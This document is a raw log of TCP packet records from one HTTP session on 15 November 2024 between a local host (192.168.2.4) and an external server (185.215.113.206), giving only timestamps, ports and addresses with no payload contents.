Nov 15, 2024 14:09:26.368653059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368665934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368669033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368685961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368700027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368716002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368757010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.369182110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.369199038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.369215012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.369237900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.369255066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.369611979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.369630098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.369646072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.369679928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.369697094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.370037079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.370055914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.370070934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.370089054 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.370104074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.370116949 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.370579004 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.370598078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.370615005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.370634079 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.370650053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.371613026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.371632099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.371646881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.371663094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.371665955 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.371679068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.371706963 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.372716904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.372735023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.372750998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.372775078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.372792006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.373771906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.373790026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.373805046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.373823881 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.373856068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.374301910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.374320030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.374339104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.374347925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.374355078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.374366999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.374401093 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.375238895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.375253916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.375262022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.375277996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.375305891 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.375329018 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376184940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376209021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376238108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376266003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376698971 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376715899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376730919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376740932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376748085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376759052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376765013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.376774073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376791000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.376818895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.462219954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.462280989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.462537050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.462548018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.462583065 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.462598085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.462996960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463021040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463037968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463049889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.463056087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463062048 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.463074923 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.463088989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.463737011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463754892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463771105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463788033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.463797092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.463829041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.464445114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.464462996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.464479923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.464495897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.464497089 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.464515924 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.464540958 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.465585947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.465604067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.465620995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.465636015 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.465639114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.465647936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.465652943 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.465667009 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.465676069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.465694904 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.466618061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.466635942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.466651917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.466666937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.466670036 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.466680050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.466701031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.466715097 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.467700005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.467716932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.467732906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.467749119 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.467752934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.467761993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.467767954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.467792988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.467813969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.468355894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.468372107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.468386889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.468403101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.468416929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.468434095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.468461037 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.469501019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.469518900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.469535112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.469551086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.469561100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.469561100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.469567060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.469577074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.469590902 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.469607115 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.470525026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.470544100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.470561981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.470575094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.470577002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.470588923 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.470611095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.470626116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.471869946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.471887112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.471903086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.471916914 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.471920013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.471925974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.471944094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.471947908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.471966982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.471982956 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.472856045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.472875118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.472891092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.472904921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.472910881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.472914934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.472948074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.472948074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.473905087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.473922968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.473939896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.473952055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.473957062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.473963022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.473984003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.473992109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.474559069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.474576950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.474592924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.474607944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.474607944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.474618912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.474627018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.474637032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.474647999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.474667072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.475495100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.475512981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.475528955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.475543976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.475547075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.475555897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.475572109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.475584984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.476447105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.476464033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.476479053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.476494074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.476495028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.476505041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.476511955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.476519108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.476535082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.476551056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.476985931 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477003098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477019072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477030993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477035999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477046967 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477062941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477082968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477489948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477508068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477524042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477540016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477541924 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477556944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.477576017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477601051 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.477627039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.478416920 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.478435040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.478451014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.478466988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.478472948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.478494883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.478518963 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.479300022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.479361057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.479629040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.479645967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.479661942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.479676962 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.479676962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.479690075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.479695082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.479701996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.479716063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.479733944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.480525017 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.480542898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.480559111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.480575085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.480577946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.480596066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.480623960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.481492043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.481509924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.481524944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.481542110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.481553078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.481559038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.481573105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.481595993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.482389927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.482408047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.482424021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.482439041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.482441902 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.482465029 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.482486010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.483792067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.483809948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.483824968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.483840942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.483846903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.483872890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.483881950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.484266043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.484282970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.484299898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.484314919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.484319925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.484329939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.484332085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.484344959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.484355927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.484384060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.485899925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.485923052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.485929012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.485934973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.485945940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.485965967 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.485991955 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.486577988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.486594915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.486609936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.486624956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.486640930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.486635923 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.486654043 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.486681938 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.488647938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.488666058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.488682032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.488697052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.488699913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.488709927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.488719940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.488749027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.489650011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.489666939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.489684105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.489700079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.489711046 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.489717007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.489729881 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.489759922 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.491121054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491187096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.491192102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491210938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491229057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491242886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491246939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.491272926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.491293907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.491619110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491637945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.491664886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.491682053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.584137917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584204912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.584455967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584481955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584527969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.584853888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584878922 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584896088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584913015 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.584916115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.584935904 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.584953070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.585465908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.585520983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.585534096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.585551977 CET	80	49752	185.215.113.206	192.168.2.4
